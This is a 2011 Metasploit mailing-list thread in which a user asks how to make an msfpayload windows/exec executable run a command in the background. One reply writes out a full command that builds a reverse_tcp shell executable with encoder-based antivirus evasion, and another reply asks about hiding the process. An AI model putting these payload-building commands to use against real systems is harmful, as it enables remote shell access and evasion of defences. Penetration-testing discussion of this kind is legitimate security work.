[framework] windows/exec

Canberk BOLAT canberk.bolat at gmail.com
Wed Mar 9 12:51:40 PST 2011 

Do you want to make it something like hidden process if i am not
understand wrong? :)

2011/3/9 alfonso caponi <alfonso.caponi at gmail.com>:
> Yes.... I know... but how can I run a Win32 command shell in background? :)
>
> My payload (created with msfpayload) works fine in "foreground".
>
> 2011/3/9 Nicolas Krassas <krasn at deventum.com>
>>
>> Google is nice many times and the results are faster than the list, it
>> will be nice for you to take a look at
>> http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
>>
>> On Wed, Mar 9, 2011 at 8:04 PM, alfonso caponi <alfonso.caponi at gmail.com>
>> wrote:
>>>
>>> mmmm no, in my scenario I need use a exe file.
>>> Would be useful windows/download_exec... :(
>>>
>>> 2011/3/9 Ahmed Shawky <ahmed at isecur1ty.org>
>>>>
>>>> ./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.8 LPORT=443 R |
>>>> msfencode -t exe -e x86/shikata_ga_nai -c 10 -o out.exe
>>>>
>>>> On Wed, Mar 9, 2011 at 6:45 PM, alfonso caponi
>>>> <alfonso.caponi at gmail.com> wrote:
>>>>>
>>>>> Hi list,
>>>>>
>>>>> according to you, using msfpayload (windows/exec), how can I create an
>>>>> executable file to run a dos shell command in background?
>>>>>
>>>>> For example a first step:
>>>>>
>>>>> ./msfpayload windows/exec CMD="ping -n 5 1.1.1.1" R | ./msfencode -e
>>>>> x86/shikata_ga_nai -c 10 -t exe -o test.exe
>>>>>
>>>>> Thank you very much,
>>>>> AL
>>>>>
>>>>> *ps: windows/download_exec not works on my XP sp3. no connections
>>>>> created and the process remains active. (#3771?)
>>>>> _______________________________________________
>>>>> https://mail.metasploit.com/mailman/listinfo/framework
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>>
>>>> Ahmed Shawky El-Antry
>>>> Pen-tester, Programmer and System administrator
>>>> lnxg33k owner "http://lnxg33k.wordpress.com"
>>>> Isecur1ty team member"http://www.isecur1ty.org"
>>>> Twitter @lnxg33k
>>>
>>>
>>> _______________________________________________
>>> https://mail.metasploit.com/mailman/listinfo/framework
>>>
>>
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
>
>



-- 
Canberk Bolat
Security Researcher
http://twitter.com/cnbrkbolat
http://cbolat.blogspot.com

More information about the framework mailing list